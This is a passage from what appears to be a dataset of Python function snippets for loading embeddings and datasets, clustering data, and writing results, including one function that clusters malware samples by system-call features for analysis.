')\n\tfor node in nodes:\n\t\tusername = node\n\t\temb = node2vec[node]\n\t\tfeatures = get_topics_w2v(username, size_w2v, df_user_text, text, w2v_model)\n\t\twalk_nodes = random_walk_sampling_simple(G, node, size_walk)\n\t\twalk = []\n\t\tfor n in walk_nodes:\n\t\t\twalk.append(node2vec[n]) \n\t\tgraph_data[node] = Node(username, emb, features, walk)\n\n\tprint('ok!')\t\n\toutfile = open(graph+'_features','wb')\n\tpickle.dump(graph_data, outfile)", "def load_file(filename):\n\tlabels = []\n\tdocs = []\n\n\twith open(filename) as f:\n\t\tfor line in f:\n\t\t\tcontent = line.split('\\t')\n\n\t\t\tif len(content) > 2:\n\t\t\t\tprint('incorrect read')\n\t\t\t\texit()\n\n\t\t\tif len(content[1]) == 0: continue\n\n\t\t\tdocs.append(str(content[1]).strip('\\r').strip('\\n').strip('\\r\\n'))\n\t\t\tlabels.append(content[0])\n\n\treturn docs, labels", "def Clustering(typeVector, behaviour, sampleType):\r\n ProduceVector.produceVector(typeVector, behaviour, sampleType)\r\n vector = ProduceVector.getVector()\r\n\r\n if sampleType == \"\":\r\n sampleType2 = \"ransomware\"\r\n if sampleType == \"2\":\r\n sampleType2 = \"backdoor\"\r\n if sampleType == \"3\":\r\n sampleType2 = \"trojan\"\r\n\r\n if (behaviour == \"f\") or (behaviour == \"fc\"): \r\n\r\n calculateStandardisation(vector)\r\n vector = getStandardisation()\r\n\r\n typeOfVector = typeVector + \" \" + behaviour\r\n\r\n nGram, syscallRep = typeOfVector.split()\r\n\r\n if syscallRep == \"b\":\r\n nGram += \"Full Representation Bit Vector\"\r\n if syscallRep == \"f\":\r\n nGram += \"Full Representation Frequency Vector\"\r\n if syscallRep == \"bc\":\r\n nGram += \"Category Bit Vector\"\r\n if syscallRep == \"fc\":\r\n nGram += \"Category Frequency Vector\"\r\n\r\n\r\n fileName = sampleType2 + \" \" + syscallRep + \" standardisation \" + nGram + \".txt\"\r\n\r\n file = open(fileName, \"w\")\r\n file.write(str(vector.tolist()))\r\n file.close()\r\n\r\n calculateEuclideanDistance(vector) \r\n\r\n typeOfVector = typeVector + \" \" + behaviour\r\n\r\n nGram, syscallRep = typeOfVector.split()\r\n\r\n if syscallRep == \"b\":\r\n nGram += \"Full Representation Bit Vector\"\r\n if syscallRep == \"f\":\r\n nGram += \"Full Representation Frequency Vector\"\r\n if syscallRep == \"bc\":\r\n nGram += \"Category Bit Vector\"\r\n if syscallRep == \"fc\":\r\n nGram += \"Category Frequency Vector\" \r\n\r\n fileName = sampleType2 + \" \" + syscallRep + \" matrix \" + nGram + \".txt\"\r\n\r\n file = open(fileName, \"w\")\r\n file.write(str(getEuclideanDistance().tolist()))\r\n file.close()\r\n\r\n print(\"Producing a dendrogram\")\r\n\r\n\r\n typeOfVector = typeVector + \" \" + behaviour\r\n\r\n setBestCluster(Validation.evaluate(getEuclideanDistance(), vector, typeOfVector, sampleType))", "def write_svm_features(clf, vectorizer, round=1, filename=\"features\"):\n\n f = open(\"%s-round%d.txt\" % (filename, round), \"w\")\n weight_feature_pairs = zip(clf.coef_.tolist()[0], vectorizer.feature_names_)\n weight_feature_pairs.sort(key=lambda x:abs(x[0]), reverse=True)\n for weight, word in weight_feature_pairs:\n f.write(\"%s\\t%g\\n\" % (word, weight))\n f.close()", "def load_data(path=\"data/cora/\", dataset=\"cora\"):\n print('Loading {} dataset...'.format(dataset))\n\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset),\n dtype=np.dtype(str))\n features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n labels = encode_onehot(idx_features_labels[:, -1])\n\n n_nodes, d_edge = features.shape\n\n # build graph\n idx = 
np.array(idx_features_labels[:, 0], dtype=np.int32)\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset),\n dtype=np.int32)\n print(edges_unordered)\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),\n dtype=np.int32).reshape(edges_unordered.shape)\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(labels.shape[0], labels.shape[0]),\n dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n node_features = normalize(features)\n adj = normalize(adj + sp.eye(adj.shape[0]))\n\n # Edge matrix\n edge_features = None\n is3d = False\n if(is3d):\n indices = [[], [] , []]\n values = []\n sizes = [n_nodes, n_nodes, d_edge]\n\n i, j = adj.nonzero()\n for e in range(len(i)):\n i_idx = node_features[i[e],:].nonzero()[1]\n j_idx = node_features[j[e],:].nonzero()[1]\n for ii in i_idx:\n indices[0].append(i[e])\n indices[1].append(j[e])\n indices[2].append(ii)\n if ii in j_idx:\n values.append((node_features[i[e],:][0,ii] + node_features[j[e],:][0,ii])/2)\n else:\n values.append(node_features[i[e],:][0,ii])\n for jj in j_idx:\n if jj in j_idx:\n continue\n else:\n indices[0].append(i[e])\n indices[1].append(j[e])\n indices[2].append(jj)\n values.append(node_features[j[e],:][0,jj])\n indices = torch.LongTensor(indices)\n values = torch.FloatTensor(values)\n edge_features = torch.sparse_coo_tensor(indices, values, sizes)\n else:\n indices = [[], []]\n values = []\n sizes = [n_nodes*n_nodes, d_edge]\n\n i, j = adj.nonzero()\n for e in range(len(i)):\n i_idx = node_features[i[e],:].nonzero()[1]\n j_idx = node_features[j[e],:].nonzero()[1]\n for ii in i_idx:\n indices[0].append(i[e]+n_nodes*j[e])\n indices[1].append(ii)\n if ii in j_idx:\n values.append((node_features[i[e],:][0,ii] + node_features[j[e],:][0,ii])/2)\n else:\n values.append(node_features[i[e],:][0,ii])\n for jj in j_idx:\n if jj in j_idx:\n continue\n else:\n indices[0].append(i[e]+n_nodes*j[e])\n indices[1].append(jj)\n values.append(node_features[j[e],:][0,jj])\n indices = torch.LongTensor(indices)\n values = torch.FloatTensor(values)\n edge_features = torch.sparse_coo_tensor(indices, values, sizes)\n\n idx_train = range(140)\n idx_val = range(200, 500)\n idx_test = range(500, 1500)\n\n node_features = torch.FloatTensor(np.array(node_features.todense()))\n\n labels = torch.LongTensor(np.where(labels)[1])\n adj = sparse_mx_to_torch_sparse_tensor(adj)\n\n idx_train = torch.LongTensor(idx_train)\n idx_val = torch.LongTensor(idx_val)\n idx_test = torch.LongTensor(idx_test)\n\n return adj, edge_features, node_features, labels, idx_train, idx_val, idx_test", "def parse_vcf(filename, gff_contigs):\n with open(filename, \"r\") as f:\n for line in f:\n if line[0] == \"#\": # ignore comment lines in vcf file\n continue\n\n elements = line.rstrip().split(\"\\t\")\n name = elements[0] # name of the contig / chromosome SNP found on\n pos = elements[1] # position of SNP in contig\n ref = elements[3] # reference basepair(s)\n alt = elements[4] # SNP basepair(s) at same location\n qual = float(elements[5]) # SNP quality, might want to filter this\n contig = gff_contigs[name] # grab contig where SNP is located\n\n # iterate over GFF annotations on his contig, printing those that\n # overlap with the position of the SNP.\n for feature in contig:\n if pos >= feature.start and pos <= feature.stop:\n extract_feature_notes(feature.contig, feature.type, feature.start, 
feature.stop, feature.direction, feature.notes, pos, ref, alt) # prints info", "def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word).lower()\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs", "def read_features_from_file(filename):\n f = loadtxt(filename)\n return f[:, :4], f[:, 4:] # feature locations, descriptors", "def main(argv):\n dataset_filename = argv[0]\n clusters_filename = dataset_filename + \".clusters.json\"\n output_filename = dataset_filename + \".output.json\"\n log_file = dataset_filename + \".log\"\n\n logger, handler = initialize_logger(log_file)\n logger.info('Start: Version 1.0.1')\n logger.debug('Logger initialized')\n logger.debug('sys.argv: %r', sys.argv)\n\n logger.debug('Loading dataset')\n dataset = load_dataset(dataset_filename)\n logger.info('Dataset loaded')\n\n logger.info('Trying to load clusters from %s', clusters_filename)\n clusters = None\n try:\n clusters = json.load(open(clusters_filename, 'r'))\n except FileNotFoundError:\n logger.warning('Clusters data file not found')\n except json.decoder.JSONDecodeError:\n logger.warning('File broken. Not Json Decodable')\n\n if not clusters:\n logger.debug('Clustering data points')\n clusters = clustering(dataset, logger)\n logger.debug(\n 'Dumping clusters data into json file: %s', clusters_filename)\n json.dump(clusters, open(clusters_filename, 'w'))\n logger.info('Data points clustered')\n\n logger.debug('Calculating meta-feature indicators')\n features = meta_features.meta_features(clusters)\n logger.debug(\n 'Dumping meta-feature indicators into json file: %s',\n clusters_filename)\n json.dump(features, open(output_filename, 'w'))\n logger.info('Meta-feature indicators calculated')\n\n logger.info('Completed')\n logger.removeHandler(handler)", "def write_vecs(self, vecs_fname):\r\n header = f'{self.vectors.shape[0]} {self.vectors.shape[1]}'\r\n np.savetxt(vecs_fname, np.hstack([self.words.reshape(-1, 1), self.vectors]), fmt='%s', header=header)", "def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs", "def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs", "def import_data_format_iris(file):\n\tdata = []\n\tcluster_location =[]\n\tf = open(str(file), 'r')\n\tfor line in f:\n\t\tcurrent = 
line.split(\",\")\n\t\tcurrent_dummy = []\n\t\tfor j in range(0,len(current)-1):\n\t\t\tcurrent_dummy.append(float(current[j]))\n\t\tj+=1 \n\t\t#print current[j]\n\t\tif current[j] == \"Iris-setosa\\n\":\n\t\t\tcluster_location.append(0)\n\t\telif current[j] == \"Iris-versicolor\\n\":\n\t\t\tcluster_location.append(1)\n\t\telse:\n\t\t\tcluster_location.append(2)\n\t\tdata.append(current_dummy)\n\tprint \"finished importing data\"\n\treturn data , cluster_location", "def glove(data_fname='glove.840B.300d.txt', out_fname='glove.pkl'):\n words, U, dim = [], [], None\n with open(DATA_DIR + data_fname, 'rb') as f:\n for j, line in enumerate(f):\n x = line.strip().split()\n word, vector, d = x[0], np.ravel(x[1:]), len(x) - 1\n if dim is None: dim = d\n elif d != dim: raise Exception('{0}: {1}!={2}'.format(j, dim, d))\n U.append(vector)\n words.append(word)\n U = np.array(U)\n print \"Found {0} words\".format(len(words))\n print \"Found {0}x{1} embedding matrix\".format(*U.shape)\n with open(DATA_DIR + out_fname, 'wb') as f:\n cPickle.dump((words, U), f)", "def data_word2vec_one_label(input_file,\n word2vec_model):\n vocab = dict([(k, v.index) for (k, v) in word2vec_model.wv.vocab.items()])\n\n def _token_to_index(content):\n result = []\n for item in content:\n word2id = vocab.get(item)\n if word2id is None:\n word2id = 0\n result.append(word2id)\n return result\n\n\n with open(input_file) as fin:\n raw_tokens_list_gov = []\n raw_tokens_list_art = []\n test_id_list = []\n content_index_list_gov = []\n content_index_list_art = []\n # labels_list = []\n onehot_labels_list = []\n labels_num_list = []\n total_line = 0\n\n for each_line in fin:\n data = json.loads(each_line)\n ds_art = data['testid']\n ds = ds_art.split(\"_\")[0]\n art = ds_art.split(\"_\")[1][1:-1]\n test_id = ds + \"_\" + art\n features_content_gov = data['gov']\n features_content_art = data['art']\n label = data['label']\n\n test_id_list.append(test_id)\n content_index_list_gov.append(_token_to_index(\n features_content_gov))\n content_index_list_art.append(_token_to_index(\n features_content_art))\n\n raw_tokens_list_gov.append(features_content_gov)\n raw_tokens_list_art.append(features_content_art)\n\n # labels_list.append(label)\n # onehot_labels_list.append(_create_onehot_labels(labels_index,\n # num_labels))\n onehot_labels_list.append(label)\n labels_num = 1\n labels_num_list.append(labels_num)\n total_line += 1\n\n\n class _Data:\n def __init__(self):\n pass\n\n @property\n def number(self):\n return total_line\n\n @property\n def testid(self):\n return test_id_list\n\n @property\n def raw_tokens_gov(self):\n return raw_tokens_list_gov\n\n @property\n def raw_tokens_art(self):\n return raw_tokens_list_art\n\n @property\n def tokenindex_gov(self):\n return content_index_list_gov\n\n @property\n def tokenindex_art(self):\n return content_index_list_art\n\n # @property\n # def labels(self):\n # return labels_list\n\n @property\n def onehot_labels(self):\n return onehot_labels_list\n\n @property\n def labels_num(self):\n return labels_num_list\n\n return _Data()", "def load_glove(path):\n with open(path) as f:\n glove = {}\n for line in f.readlines():\n values = line.split()\n word = values[0]\n vector = np.array(values[1:], dtype='float32')\n glove[word] = vector\n return glove", "def load_glove(path):\n with open(path) as f:\n glove = {}\n for line in f.readlines():\n values = line.split()\n word = values[0]\n vector = np.array(values[1:], dtype='float32')\n glove[word] = vector\n return glove", "def print_cluster(self):\n 
print('Cluster', self.number)\n for pattern in self.patterns:\n pattern.print_pattern()", "def senna(vector_f='embeddings.txt', words_f ='words.lst', out_f='senna.pkl'):\n with open(DATA_DIR + words_f, 'rb') as f:\n words = [line.strip() for line in f]\n M = np.loadtxt(DATA_DIR + vector_f)\n print \"Found {0} words\".format(len(words))\n print \"Found {0}x{1} embedding matrix\".format(*M.shape)\n with open(DATA_DIR + out_f, 'wb') as f:\n cPickle.dump((words, M), f)", "def main():\n for dim in (50, 100, 200, 300):\n data_file = data.FileFinder().get_file('GLOVE_TXT_FILE').format(dim)\n output_file = data.FileFinder().get_file('GLOVE_WORD2VEC_FILE').format(dim)\n print(\"Converting {} to {}\".format(data_file, output_file))\n glove2word2vec(data_file, output_file)", "def cluster(log, inputf, clustindx, lmax, clustsize):\n cmdargs = split('cluster --in={} --thresh=0.01 --oindex={} \\\n --olmax={} --osize={} --mm'.format(\n inputf, clustindx, lmax, clustsize))\n proc = Popen(cmdargs, stdout=PIPE, stderr=STDOUT)\n log.info(proc.stdout.read())", "def load_labels_index_map(self, file_path):\n with open(file_path) as handle:\n self._labels_2_index = json.loads(handle.read())\n self._index_2_labels = {i: label.lower() for label, i in self._labels_2_index.items()}\n self._labels_dim = len(self._labels_2_index)", "def load_bin_vec(self, fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n print header\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32')\n # logger.info(word_vecs[word])\n else:\n f.read(binary_len)\n # logger.info(\"num words already in word2vec: \" + str(len(word_vecs)))\n return word_vecs", "def gather_and_save_vectors(path, words_vec = collections.defaultdict(list), features = []):\n with open(path, 'rt', encoding='mac_roman') as csvfile:\n csvreader = csv.reader(csvfile, delimiter=' ', quotechar='\"')\n for row in csvreader:\n words_vec, features = countize(row[3], row[2], words_vec, features)\n try:\n words_vec, features = countize(row[6], row[2], words_vec, features)\n except:\n pass\n pickle.dump(words_vec, open(\"ind_vectors.data\", \"wb\"))\n pickle.dump(features, open(\"i_features.data\", \"wb\"))\n return words_vec, features", "def graph(self, file_data):\n\n self.file_data = file_data\n self.features, self.headers = get_features(file_data)\n\n # FIXME make it so that the outliers can be visualized as well\n self.new_scaled_features, self.features = manipulate_features(self.features, file_data)\n # features = scaler.inverse_transform(new_scaled_features)\n\n if self.show_outliers:\n self.new_scaled_features, self.outliers, self.outlier_detector = find_and_remove_outliers(\n self.new_scaled_features)\n\n if self.manually_find_remove_outliers:\n selector = remove_outliers(self.new_scaled_features)\n\n self.new_scaled_features = self.new_scaled_features[selector.indexes]\n self.features = self.features[selector.indexes]\n\n self.labels = self.clf.predict(self.new_scaled_features)\n self.color_labels = list(map(lambda x: 'r' if x == 0 else 'b', self.labels))", "def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = 
np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch) \n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n return word_vecs", "def assign_labels_to_centroids(self):\n labelled_centroids = []\n for i in range(len(self.final_clusters)):\n labels = map(lambda x: x[0], self.final_clusters[i])\n # pick the most common label\n most_common = Counter(labels).most_common(1)[0][0]\n c = np.round(len([item for item in self.final_clusters[i] if item[0]==1])/len(self.final_clusters[i]),2)\n if c>=0.46:\n most_common = 1.0\n centroid = (most_common, self.final_centroids[i])\n labelled_centroids.append(centroid)\n\n self.labelled_centroids = labelled_centroids\n print(\"cluster_0: \", np.round(len([item for item in self.final_clusters[0] if item[0]==1])/len(self.final_clusters[0]),2), \"size_0: \", len(self.final_clusters[0]))\n print(\"cluster_1: \", np.round(len([item for item in self.final_clusters[1] if item[0]==1])/len(self.final_clusters[1]),2), \"size_1: \", len(self.final_clusters[1]))\n #print(\"cluster_2: \", np.round(len([item for item in self.final_clusters[2] if item[0]==1])/len(self.final_clusters[2]),2), \"size_2: \", len(self.final_clusters[2]))\n #print(\"cluster_3: \", np.round(len([item for item in self.final_clusters[3] if item[0]==1])/len(self.final_clusters[3]),2), \"size_2: \", len(self.final_clusters[3]))", "def main(dataset=None, min_dens=1 * 10 ** -6, eps=0.0001, h=7):\n if dataset is None:\n dataset = pd.read_csv(\"iris.txt\", header=None, names=[\"x1\", \"x2\", \"x3\", \"x4\", \"label\"])\n print(f\"Inputs mindensity:{min_dens}\\teps:{eps}\\th:{h}\")\n cluster_map, cluster_center = denclue(np.array(dataset.iloc[:, [0, 1, 2, 3]]), min_dens, eps, h)\n dataset[\"cluster\"] = -1\n for c, points in cluster_map.items():\n dataset.at[points, \"cluster\"] = c\n print(\"Attractor:\", cluster_center[c])\n print(\"Points in cluster:\", points)\n print(\"Size of each cluster\")\n print(\"Clusters Assigned by Algorithm:\", \"\\n\", dataset.groupby(by=\"cluster\").count()['x1'])\n print(\"Original Clusters:\", \"\\n\", dataset.groupby(by=\"label\").count()['x1'])\n print(\"Purity:\", calculate_purity(dataset, len(cluster_map)))", "def cluster_dstructure_output(self, curs, output_fname, order_1st_id2all_clusters):\n\t\tfrom codense.common import get_gene_no2gene_id\n\t\tgene_no2gene_id = get_gene_no2gene_id(curs)\n\t\tsys.stderr.write(\"Outputting cluster information...\")\n\t\toutf = open(output_fname, 'w')\n\t\tstr_tmp_list0 = []\t#hold the 1st-order clusters\n\t\tfor order_1st_id,all_2nd_order_clusters in order_1st_id2all_clusters.iteritems():\n\t\t\tstr_tmp_list1 = []\t#hold the 2nd-order clusters\n\t\t\tfor order_2nd_id,cluster_list in all_2nd_order_clusters.iteritems():\n\t\t\t\tstr_tmp_list2 = []\t#hold the connected components\n\t\t\t\tfor cluster in cluster_list:\n\t\t\t\t\tstr_tmp = self.return_string_form_of_cluster_dstructure(cluster, gene_no2gene_id)\n\t\t\t\t\tstr_tmp_list2.append(str_tmp)\n\t\t\t\tstr_tmp_list1.append(\"[%s]\"%','.join(str_tmp_list2))\n\t\t\tstr_tmp_list0.append(\"[%s]\"%\",\".join(str_tmp_list1))\n\t\t#'r:=' is for directly read in as an array\n\t\toutf.write(\"r:=[%s]:\"%\",\".join(str_tmp_list0))\n\t\toutf.close()\n\t\tsys.stderr.write(\"Done.\\n\")", "def extract_labels(nlabels,filename, one_hot=False):\n print('Extracting', 
filename,'bbbccicicicicib')\n\n labels=numpy.loadtxt(filename,dtype='int64')\n \n if one_hot:\n print(\"LABELS ONE HOT\")\n print(labels.shape)\n XXX=dense_to_one_hot(labels,nlabels)\n print(XXX.shape)\n return dense_to_one_hot(labels,nlabels)\n print(\"LABELS\")\n print(labels.shape)\n return labels", "def load_vectors(vec_file, info_file, buckets):\n vectors = np.load(vec_file)\n with open(info_file, 'r') as f:\n info = json.load(f)\n\n if len(info['sequence_id_list']) != len(info['instance_id_list']):\n raise ValueError('Invalid info file: len(info[''sequence_id_list'']) should be equal to len(info[''instance_id_list'']) but got %d != %d' % (len(info['sequence_id_list']), len(info['instance_id_list'])))\n if vectors.shape[0] != len(info['instance_id_list']):\n raise ValueError('Number of vectors and length of info list are not identical. %d != %d' % (len(info['sequence_id_list']), len(info['instance_id_list'])))\n\n num_vec, vec_dim = vectors.shape\n prev_seq_id, prev_ins_id = None, None\n seq_ids = {i: [] for i in xrange(len(buckets))}\n ins_ids = {i: [] for i in xrange(len(buckets))}\n data = {i: [] for i in xrange(len(buckets))}\n\n for vec_idx in tqdm(xrange(num_vec)):\n curr_seq_id, curr_ins_id = info['sequence_id_list'][vec_idx], info['instance_id_list'][vec_idx]\n if curr_seq_id != prev_seq_id or curr_ins_id != prev_ins_id:\n if prev_seq_id is not None:\n bucket_id, curr_sample = bucketing(vec_count, buckets, vec_dim, curr_sample)\n seq_ids[bucket_id].append(prev_seq_id)\n ins_ids[bucket_id].append(prev_ins_id)\n data[bucket_id].append(curr_sample)\n vec_count = 1\n curr_sample = vectors[vec_idx]\n else:\n vec_count += 1\n curr_sample = np.vstack((curr_sample, vectors[vec_idx]))\n prev_seq_id = curr_seq_id\n prev_ins_id = curr_ins_id\n\n # throw the last sample into bucket\n bucket_id, curr_sample = bucketing(vec_count, buckets, vec_dim, curr_sample)\n seq_ids[bucket_id].append(prev_seq_id)\n ins_ids[bucket_id].append(prev_ins_id)\n data[bucket_id].append(curr_sample)\n\n return data, seq_ids, ins_ids", "def get_labeled_data(filename):\n e = []\n y = []\n with open(filename) as f:\n for line in f:\n e.append(line[1:-1])\n y.append(category_mapping[abbreviation_mapping[line[0]]])\n return e, y", "def k_means(n_clust, data_frame, true_labels):\n k_means = KMeans(n_clusters=n_clust, random_state=123, n_init=30)\n k_means.fit(data_frame)\n c_labels = k_means.labels_\n df = pd.DataFrame({'clust_label': c_labels, 'orig_label': true_labels.tolist()})\n ct = pd.crosstab(df['clust_label'], df['orig_label'])\n y_clust = k_means.predict(data_frame)\n display(ct)\n print('% 9s' % 'inertia homo compl v-meas ARI AMI silhouette')\n print('%i %.3f %.3f %.3f %.3f %.3f %.3f'\n % (k_means.inertia_,\n homogeneity_score(true_labels, y_clust),\n completeness_score(true_labels, y_clust),\n v_measure_score(true_labels, y_clust),\n adjusted_rand_score(true_labels, y_clust),\n adjusted_mutual_info_score(true_labels, y_clust),\n silhouette_score(data_frame, y_clust, metric='euclidean')))", "def cluster_classification_tex(f,browsing_matrix,diversifying_matrix, weblog,session_data_threshold,cluster_type,classification_column_diversity,classification_wanted_transaction):\n divpat_classification_wanted_transaction = classification_wanted_transaction\n divpat_N_classification_wanted_transaction=len(divpat_classification_wanted_transaction)\n f.write(\"\\n% 6. 
Cluster Classification\")\n columns_latex = '|'+'c|'*len(session_data_threshold[cluster_type].unique())\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DivColumnsLatex',columns_latex)) \n columns_blank = ' ' + '& '*(len(session_data_threshold[cluster_type].unique()) -1)\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DivColumnsBlank',columns_blank)) \n cluster_list = []\n ieuc_clusters = []\n star_chain_like_clusters = []\n length_clusters = []\n browsing_pattern_1 = []\n browsing_pattern_2 = []\n browsing_pattern_3 = []\n diversifying_pattern_1 = []\n diversifying_pattern_2 = []\n diversifying_pattern_3 = []\n cluster_ids = session_data_threshold[cluster_type].unique()\n cluster_ids.sort()\n for cluster_id in cluster_ids:\n cluster_list.append(str(cluster_id))\n \n cluster_session_list=session_data_threshold[session_data_threshold[cluster_type]==cluster_id].session_id.values\n temp_cluster_weblog=weblog[weblog.session_id.isin(cluster_session_list)]\n pa,pa_names = proportional_abundance(temp_cluster_weblog,'requested_'+classification_column_diversity)\n cluster_entropy=ShannonEntropy(pa,normalize=True)\n \n ieuc_clusters.append(str(round(np.power(2.0,cluster_entropy),2)))\n star_chain_like_clusters.append(star_chain_str(session_data_threshold[session_data_threshold[cluster_type]==cluster_id].star_chain_like.mean()))\n length_clusters.append(length(session_data_threshold[session_data_threshold[cluster_type]==cluster_id].requests.mean()))\n # Browsing patterns\n r,c=np.unravel_index(browsing_matrix[cluster_id][:-1,:-1].argsort(axis=None)[::-1][:3],dims=(divpat_N_classification_wanted_transaction,divpat_N_classification_wanted_transaction))\n browsing_pattern_1.append('%.1f\\%%: %s$\\\\rightarrow$%s'%(100.0*browsing_matrix[cluster_id][r[0],c[0]],divpat_classification_wanted_transaction[r[0]],divpat_classification_wanted_transaction[c[0]]))\n browsing_pattern_2.append('%.1f\\%%: %s$\\\\rightarrow$%s'%(100.0*browsing_matrix[cluster_id][r[1],c[1]],divpat_classification_wanted_transaction[r[1]],divpat_classification_wanted_transaction[c[1]]))\n browsing_pattern_3.append('%.1f\\%%: %s$\\\\rightarrow$%s'%(100.0*browsing_matrix[cluster_id][r[2],c[2]],divpat_classification_wanted_transaction[r[2]],divpat_classification_wanted_transaction[c[2]]))\n \n # Diversifying patterns\n r,c=np.unravel_index(np.nan_to_num(diversifying_matrix[cluster_id])[:-1,:-1].argsort(axis=None)[::-1][:3],dims=(divpat_N_classification_wanted_transaction,divpat_N_classification_wanted_transaction))\n diversifying_pattern_1.append('%.1f\\%%: %s$\\\\rightarrow$%s'%(100.0*diversifying_matrix[cluster_id][r[0],c[0]],divpat_classification_wanted_transaction[r[0]],divpat_classification_wanted_transaction[c[0]]))\n diversifying_pattern_2.append('%.1f\\%%: %s$\\\\rightarrow$%s'%(100.0*diversifying_matrix[cluster_id][r[1],c[1]],divpat_classification_wanted_transaction[r[1]],divpat_classification_wanted_transaction[c[1]]))\n diversifying_pattern_3.append('%.1f\\%%: %s$\\\\rightarrow$%s'%(100.0*diversifying_matrix[cluster_id][r[2],c[2]],divpat_classification_wanted_transaction[r[2]],divpat_classification_wanted_transaction[c[2]]))\n\n del temp_cluster_weblog\n \n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DivClusterList',' & '.join(cluster_list)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DivIEUCClusters',' & '.join(ieuc_clusters)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('StarChainClusters',' & '.join(star_chain_like_clusters)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('LengthClusters',' & '.join(length_clusters)))\n 
f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('BrowsingPatternClustersOne',' & '.join(browsing_pattern_1)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('BrowsingPatternClustersTwo',' & '.join(browsing_pattern_2)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('BrowsingPatternClustersThree',' & '.join(browsing_pattern_3)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DiversifyingPatternClustersOne',' & '.join(diversifying_pattern_1)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DiversifyingPatternClustersTwo',' & '.join(diversifying_pattern_2)))\n f.write(\"\\n\\\\newcommand{\\\\%s}{%s}\"%('DiversifyingPatternClustersThree',' & '.join(diversifying_pattern_3)))\n\n return f;", "def read_from_file(self,fn):\n fh = open(fn,\"r\")\n labels = []\n xyz = []\n sizes = []\n colors = []\n for line in fh.readlines():\n try:\n if not line.startswith(\"#\"):\n label,x,y,z,size,r,g,b = line.split(\",\")\n labels.append(label)\n xyz.append([x,y,z])\n sizes.append(size)\n colors.append((float(r),float(g),float(b)))\n except IOError, ioe:\n print \"IOError:\", ioe\n self._labels = np.array(labels)\n self._xyz = np.array(xyz).astype(\"f\")\n self._sizes = np.array(sizes).astype(\"f\")\n self._colors = np.array(colors)", "def load_point_cloud(self, filename):\n f = sio.loadmat(filename)\n data = f['blob'][:]\n data -= np.mean(data, 0)\n data /= np.amax(abs(data))\n label = DataHandler.get_label_from_filename(filename)\n if self.use_softmax:\n l = np.zeros([2])\n l[label] = 1\n label = l\n return data, label", "def dump_vecs():\n v_file = os.path.join(TMP_DIR, 'vectorizer.pickle')\n d_file = os.path.join(TMP_DIR, 'dectorizer.pickle')\n f_file = os.path.join(TMP_DIR, 'freq.pickle')\n \n with open(v_file, 'wb') as f:\n pickle.dump(VECTORIZER, f)\n with open(d_file, 'wb') as f:\n pickle.dump(CECTORIZER, f)", "def clustering(pcd: o3d.geometry.PointCloud):\n with o3d.utility.VerbosityContextManager(o3d.utility.VerbosityLevel.Debug) as cm:\n labels = np.array(pcd.cluster_dbscan(eps=1, min_points=30, print_progress=True))\n\n max_label = labels.max()\n print(f\"point cloud has {max_label + 1} clusters\")\n colors = plt.get_cmap(\"tab20b\")(labels / (max_label if max_label > 0 else 1))\n colors[labels < 0] = 0\n pcd.colors = o3d.utility.Vector3dVector(colors[:, :3])\n return pcd, labels", "def load_vectors_novocab(path: str) -> 